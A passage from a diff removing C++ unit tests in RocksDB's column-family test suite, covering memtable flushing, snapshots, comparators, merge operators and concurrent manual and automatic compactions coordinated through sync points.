-  AssertNumberOfImmutableMemtables({0, 1, 0, 0});
-  AssertCountLiveLogFiles(2);
-  PutRandomData(2, 1000, 1000);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 1, 0});
-  AssertCountLiveLogFiles(3);
-  PutRandomData(2, 1000, 1000);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 0});
-  AssertCountLiveLogFiles(4);
-  PutRandomData(3, 93, 990);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 1});
-  AssertCountLiveLogFiles(5);
-  PutRandomData(3, 88, 990);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 2});
-  AssertCountLiveLogFiles(6);
-  PutRandomData(3, 88, 990);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 3});
-  AssertCountLiveLogFiles(7);
-  PutRandomData(0, 100, 1000);
-  WaitForFlush(0);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 3});
-  AssertCountLiveLogFiles(8);
-  PutRandomData(2, 100, 10000);
-  WaitForFlush(2);
-  AssertNumberOfImmutableMemtables({0, 1, 0, 3});
-  AssertCountLiveLogFiles(9);
-  PutRandomData(3, 88, 990);
-  WaitForFlush(3);
-  AssertNumberOfImmutableMemtables({0, 1, 0, 0});
-  AssertCountLiveLogFiles(10);
-  PutRandomData(3, 88, 990);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 0, 1});
-  AssertCountLiveLogFiles(11);
-  PutRandomData(1, 200, 1000);
-  WaitForFlush(1);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 1});
-  AssertCountLiveLogFiles(5);
-  PutRandomData(3, 88 * 3, 990);
-  WaitForFlush(3);
-  PutRandomData(3, 88 * 4, 990);
-  WaitForFlush(3);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(12);
-  PutRandomData(0, 100, 1000);
-  WaitForFlush(0);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(12);
-  PutRandomData(2, 3 * 1000, 1000);
-  WaitForFlush(2);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(12);
-  PutRandomData(1, 2*200, 1000);
-  WaitForFlush(1);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(7);
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // Cuckoo is not supported in lite
-TEST_F(ColumnFamilyTest, MemtableNotSupportSnapshot) {
-  db_options_.allow_concurrent_memtable_write = false;
-  Open();
-  auto* s1 = dbfull()->GetSnapshot();
-  ASSERT_TRUE(s1 != nullptr);
-  dbfull()->ReleaseSnapshot(s1);
-
-  // Add a column family that doesn't support snapshot
-  ColumnFamilyOptions first;
-  first.memtable_factory.reset(NewHashCuckooRepFactory(1024 * 1024));
-  CreateColumnFamilies({"first"}, {first});
-  auto* s2 = dbfull()->GetSnapshot();
-  ASSERT_TRUE(s2 == nullptr);
-
-  // Add a column family that supports snapshot. Snapshot stays not supported.
-  ColumnFamilyOptions second;
-  CreateColumnFamilies({"second"}, {second});
-  auto* s3 = dbfull()->GetSnapshot();
-  ASSERT_TRUE(s3 == nullptr);
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-class TestComparator : public Comparator {
-  int Compare(const rocksdb::Slice& a, const rocksdb::Slice& b) const override {
-    return 0;
-  }
-  const char* Name() const override { return "Test"; }
-  void FindShortestSeparator(std::string* start,
-                             const rocksdb::Slice& limit) const override {}
-  void FindShortSuccessor(std::string* key) const override {}
-};
-
-static TestComparator third_comparator;
-static TestComparator fourth_comparator;
-
-// Test that we can retrieve the comparator from a created CF
-TEST_F(ColumnFamilyTest, GetComparator) {
-  Open();
-  // Add a column family with no comparator specified
-  CreateColumnFamilies({"first"});
-  const Comparator* comp = handles_[0]->GetComparator();
-  ASSERT_EQ(comp, BytewiseComparator());
-
-  // Add three column families - one with no comparator and two
-  // with comparators specified
-  ColumnFamilyOptions second, third, fourth;
-  second.comparator = &third_comparator;
-  third.comparator = &fourth_comparator;
-  CreateColumnFamilies({"second", "third", "fourth"}, {second, third, fourth});
-  ASSERT_EQ(handles_[1]->GetComparator(), BytewiseComparator());
-  ASSERT_EQ(handles_[2]->GetComparator(), &third_comparator);
-  ASSERT_EQ(handles_[3]->GetComparator(), &fourth_comparator);
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, DifferentMergeOperators) {
-  Open();
-  CreateColumnFamilies({"first", "second"});
-  ColumnFamilyOptions default_cf, first, second;
-  first.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  second.merge_operator = MergeOperators::CreateStringAppendOperator();
-  Reopen({default_cf, first, second});
-
-  std::string one, two, three;
-  PutFixed64(&one, 1);
-  PutFixed64(&two, 2);
-  PutFixed64(&three, 3);
-
-  ASSERT_OK(Put(0, "foo", two));
-  ASSERT_OK(Put(0, "foo", one));
-  ASSERT_TRUE(Merge(0, "foo", two).IsNotSupported());
-  ASSERT_EQ(Get(0, "foo"), one);
-
-  ASSERT_OK(Put(1, "foo", two));
-  ASSERT_OK(Put(1, "foo", one));
-  ASSERT_OK(Merge(1, "foo", two));
-  ASSERT_EQ(Get(1, "foo"), three);
-
-  ASSERT_OK(Put(2, "foo", two));
-  ASSERT_OK(Put(2, "foo", one));
-  ASSERT_OK(Merge(2, "foo", two));
-  ASSERT_EQ(Get(2, "foo"), one + "," + two);
-  Close();
-}
-
-#ifndef ROCKSDB_LITE  // WaitForFlush() is not supported
-TEST_F(ColumnFamilyTest, DifferentCompactionStyles) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = static_cast<uint64_t>(1) << 60;
-
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  two.compaction_style = kCompactionStyleLevel;
-  two.num_levels = 4;
-  two.level0_file_num_compaction_trigger = 3;
-  two.write_buffer_size = 100000;
-
-  Reopen({default_cf, one, two});
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 1; ++i) {
-    PutRandomData(1, 10, 12000);
-    PutRandomData(1, 1, 10);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-
-  // SETUP column family "two" -- level style with 4 levels
-  for (int i = 0; i < two.level0_file_num_compaction_trigger - 1; ++i) {
-    PutRandomData(2, 10, 12000);
-    PutRandomData(2, 1, 10);
-    WaitForFlush(2);
-    AssertFilesPerLevel(ToString(i + 1), 2);
-  }
-
-  // TRIGGER compaction "one"
-  PutRandomData(1, 10, 12000);
-  PutRandomData(1, 1, 10);
-
-  // TRIGGER compaction "two"
-  PutRandomData(2, 10, 12000);
-  PutRandomData(2, 1, 10);
-
-  // WAIT for compactions
-  WaitForCompaction();
-
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-
-  // VERIFY compaction "two"
-  AssertFilesPerLevel("0,1", 2);
-  CompactAll(2);
-  AssertFilesPerLevel("0,1", 2);
-
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-// Sync points not supported in RocksDB Lite
-
-TEST_F(ColumnFamilyTest, MultipleManualCompactions) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  two.compaction_style = kCompactionStyleLevel;
-  two.num_levels = 4;
-  two.level0_file_num_compaction_trigger = 3;
-  two.write_buffer_size = 100000;
-
-  Reopen({default_cf, one, two});
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::MultiManual:4", "ColumnFamilyTest::MultiManual:1"},
-       {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:5"},
-       {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:3");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  std::vector<port::Thread> threads;
-  threads.emplace_back([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  // SETUP column family "two" -- level style with 4 levels
-  for (int i = 0; i < two.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(2, 10, 12000);
-    PutRandomData(2, 1, 10);
-    WaitForFlush(2);
-    AssertFilesPerLevel(ToString(i + 1), 2);
-  }
-  threads.emplace_back([&] {
-    TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:1");
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[2], nullptr, nullptr));
-    TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:2");
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:5");
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-
-  // VERIFY compaction "two"
-  AssertFilesPerLevel("0,1", 2);
-  CompactAll(2);
-  AssertFilesPerLevel("0,1", 2);
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, AutomaticAndManualCompactions) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  two.compaction_style = kCompactionStyleLevel;
-  two.num_levels = 4;
-  two.level0_file_num_compaction_trigger = 3;
-  two.write_buffer_size = 100000;
-
-  Reopen({default_cf, one, two});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  bool cf_1_1 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::AutoManual:4", "ColumnFamilyTest::AutoManual:1"},
-       {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:5"},
-       {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4");
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:3");
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:1");
-
-  // SETUP column family "two" -- level style with 4 levels
-  for (int i = 0; i < two.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(2, 10, 12000);
-    PutRandomData(2, 1, 10);
-    WaitForFlush(2);
-    AssertFilesPerLevel(ToString(i + 1), 2);
-  }
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[2], nullptr, nullptr));
-    TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:2");
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:5");
-  threads.join();
-
-  // WAIT for compactions
-  WaitForCompaction();
-
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-
-  // VERIFY compaction "two"
-  AssertFilesPerLevel("0,1", 2);
-  CompactAll(2);
-  AssertFilesPerLevel("0,1", 2);
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-TEST_F(ColumnFamilyTest, ManualAndAutomaticCompactions) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  two.compaction_style = kCompactionStyleLevel;
-  two.num_levels = 4;
-  two.level0_file_num_compaction_trigger = 3;
-  two.write_buffer_size = 100000;
-
-  Reopen({default_cf, one, two});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:1"},
-       {"ColumnFamilyTest::ManualAuto:5", "ColumnFamilyTest::ManualAuto:2"},
-       {"ColumnFamilyTest::ManualAuto:2", "ColumnFamilyTest::ManualAuto:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:1");
-
-  // SETUP column family "two" -- level style with 4 levels
-  for (int i = 0; i < two.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(2, 10, 12000);
-    PutRandomData(2, 1, 10);
-    WaitForFlush(2);
-    AssertFilesPerLevel(ToString(i + 1), 2);
-  }
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:5");
-  threads.join();
-
-  // WAIT for compactions
-  WaitForCompaction();
-
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-
-  // VERIFY compaction "two"
-  AssertFilesPerLevel("0,1", 2);
-  CompactAll(2);
-  AssertFilesPerLevel("0,1", 2);
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-TEST_F(ColumnFamilyTest, SameCFManualManualCompactions) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::ManualManual:4", "ColumnFamilyTest::ManualManual:2"},
-       {"ColumnFamilyTest::ManualManual:4", "ColumnFamilyTest::ManualManual:5"},
-       {"ColumnFamilyTest::ManualManual:1", "ColumnFamilyTest::ManualManual:2"},
-       {"ColumnFamilyTest::ManualManual:1",
-        "ColumnFamilyTest::ManualManual:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = true;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:5");
-
-  WaitForFlush(1);
-
-  // Add more L0 files and force another manual compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(one.level0_file_num_compaction_trigger + i),
-                        1);
-  }
-
-  rocksdb::port::Thread threads1([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:1");
-
-  threads.join();
-  threads1.join();
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  ASSERT_LE(NumTableFilesAtLevel(0, 1), 2);
-
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactions) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:2"},
-       {"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:5"},
-       {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:2"},
-       {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:5");
-
-  WaitForFlush(1);
-
-  // Add more L0 files and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(one.level0_file_num_compaction_trigger + i),
-                        1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:1");
-
-  threads.join();
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  ASSERT_LE(NumTableFilesAtLevel(0, 1), 2);
-
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactionsLevel) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleLevel;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 3;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- level style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:2"},
-       {"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:5"},
-       {"ColumnFamilyTest::ManualAuto:3", "ColumnFamilyTest::ManualAuto:2"},
-       {"LevelCompactionPicker::PickCompactionBySize:0",
-        "ColumnFamilyTest::ManualAuto:3"},
-       {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:5");
-
-  // Add more L0 files and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(one.level0_file_num_compaction_trigger + i),
-                        1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:1");
-
-  threads.join();
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("0,1", 1);
-
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-// This test checks for automatic getting a conflict if there is a
-// manual which has not yet been scheduled.
-// The manual compaction waits in NotScheduled
-// We generate more files and then trigger an automatic compaction
-// This will wait because there is an unscheduled manual compaction.
-// Once the conflict is hit, the manual compaction starts and ends
-// Then another automatic will start and end.
-TEST_F(ColumnFamilyTest, SameCFManualAutomaticConflict) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
